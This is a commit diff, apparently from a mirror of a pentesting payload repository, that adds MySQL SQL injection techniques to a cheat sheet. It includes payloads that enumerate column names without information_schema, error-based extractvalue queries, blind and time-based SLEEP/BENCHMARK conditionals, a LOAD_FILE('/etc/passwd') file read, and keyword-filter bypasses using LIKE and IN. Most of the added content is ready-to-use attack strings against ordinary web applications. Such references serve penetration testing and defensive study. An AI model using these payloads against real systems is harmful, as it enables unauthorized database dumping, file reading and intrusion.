mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-22 20:36:12 +00:00
SQL injection - MySQL version for error based
This commit is contained in:
parent
40f86d39b0
commit
4e17443d62
SQL injection
@ -30,6 +30,35 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_sc
|
|||||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Extract columns name without information_schema
|
||||||
|
|
||||||
|
Method for `MySQL >= 4.1`.
|
||||||
|
|
||||||
|
First extract the column number with
|
||||||
|
```sql
|
||||||
|
?id=(1)and(SELECT * from db.users)=(1)
|
||||||
|
-- Operand should contain 4 column(s)
|
||||||
|
```
|
||||||
|
|
||||||
|
Then extract the column name.
|
||||||
|
```sql
|
||||||
|
?id=1 and (1,2,3,4) = (SELECT * from db.users UNION SELECT 1,2,3,4 LIMIT 1)
|
||||||
|
--Column 'id' cannot be null
|
||||||
|
```
|
||||||
|
|
||||||
|
Method for `MySQL 5`
|
||||||
|
|
||||||
|
```sql
|
||||||
|
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b)a
|
||||||
|
--#1060 - Duplicate column name 'id'
|
||||||
|
|
||||||
|
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a
|
||||||
|
-- #1060 - Duplicate column name 'name'
|
||||||
|
|
||||||
|
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id,name))a
|
||||||
|
...
|
||||||
|
```
|
||||||
|
|
||||||
### Extract data without information_schema
|
### Extract data without information_schema
|
||||||
|
|
||||||
Extracting data from the 4th column without knowing its name.
|
Extracting data from the 4th column without knowing its name.
|
||||||
@ -40,7 +69,7 @@ select `4` from (select 1,2,3,4,5,6 union select * from users)dbname;
|
|||||||
|
|
||||||
Injection example inside the query `select author_id,title from posts where author_id=[INJECT_HERE]`
|
Injection example inside the query `select author_id,title from posts where author_id=[INJECT_HERE]`
|
||||||
|
|
||||||
````sql
|
```sql
|
||||||
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
|
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
|
||||||
+-----------+-----------------------------------------------------------------+
|
+-----------+-----------------------------------------------------------------+
|
||||||
| author_id | title |
|
| author_id | title |
|
||||||
@ -52,6 +81,8 @@ MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union se
|
|||||||
|
|
||||||
## MYSQL Error Based - Basic
|
## MYSQL Error Based - Basic
|
||||||
|
|
||||||
|
Works with `MySQL >= 4.1`
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
||||||
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
||||||
@ -76,6 +107,8 @@ Shorter to read:
|
|||||||
|
|
||||||
## MYSQL Error Based - Extractvalue function
|
## MYSQL Error Based - Extractvalue function
|
||||||
|
|
||||||
|
Works with `MySQL >= 5.1`
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
||||||
@ -84,6 +117,16 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12
|
|||||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## MYSQL Blind with substring equivalent
|
||||||
|
|
||||||
|
```sql
|
||||||
|
?id=1 and substring(version(),1,1)=5
|
||||||
|
?id=1 and right(left(version(),1),1)=5
|
||||||
|
?id=1 and left(version(),1)=4
|
||||||
|
?id=1 and ascii(lower(substr(Version(),1,1)))=51
|
||||||
|
?id=1 and (select mid(version(),1,1)=4)
|
||||||
|
```
|
||||||
|
|
||||||
## MYSQL Blind using a conditional statement
|
## MYSQL Blind using a conditional statement
|
||||||
|
|
||||||
TRUE: `if @@version starts with a 5`:
|
TRUE: `if @@version starts with a 5`:
|
||||||
@ -129,12 +172,9 @@ SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';
|
|||||||
AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1
|
AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1
|
||||||
RLIKE SLEEP([SLEEPTIME])
|
RLIKE SLEEP([SLEEPTIME])
|
||||||
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
|
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
|
||||||
```
|
|
||||||
|
|
||||||
## MYSQL Read content of a file
|
?id=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
|
||||||
|
?id=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
|
||||||
```sql
|
|
||||||
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL DIOS - Dump in One Shot
|
## MYSQL DIOS - Dump in One Shot
|
||||||
@ -144,6 +184,14 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
|
|||||||
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## MYSQL Read content of a file
|
||||||
|
|
||||||
|
Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement`
|
||||||
|
|
||||||
|
```sql
|
||||||
|
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
||||||
|
```
|
||||||
|
|
||||||
## MYSQL DROP SHELL
|
## MYSQL DROP SHELL
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
@ -178,8 +226,8 @@ select 'osanda' into outfile '\\\\error\\abc';
|
|||||||
load data infile '\\\\error\\abc' into table database.table_name;
|
load data infile '\\\\error\\abc' into table database.table_name;
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
- [MySQL Out of Band Hacking - @OsandaMalith](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
|
- [MySQL Out of Band Hacking - @OsandaMalith](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
|
||||||
- [[Sqli] Extracting data without knowing columns names - Ahmed Sultan @0x4148](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
|
- [[Sqli] Extracting data without knowing columns names - Ahmed Sultan @0x4148](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
|
||||||
|
- [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1)
|
@ -415,6 +415,14 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
|
|||||||
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
|
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
|
||||||
```
|
```
|
||||||
|
|
||||||
|
No Equal - bypass using LIKE/NOT IN/IN
|
||||||
|
|
||||||
|
```sql
|
||||||
|
?id=1 and substring(version(),1,1)like(5)
|
||||||
|
?id=1 and substring(version(),1,1)not in(4,3)
|
||||||
|
?id=1 and substring(version(),1,1)in(4,3)
|
||||||
|
```
|
||||||
|
|
||||||
Blacklist using keywords - bypass using uppercase/lowercase
|
Blacklist using keywords - bypass using uppercase/lowercase
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
|
Loading…
Reference in New Issue
Block a user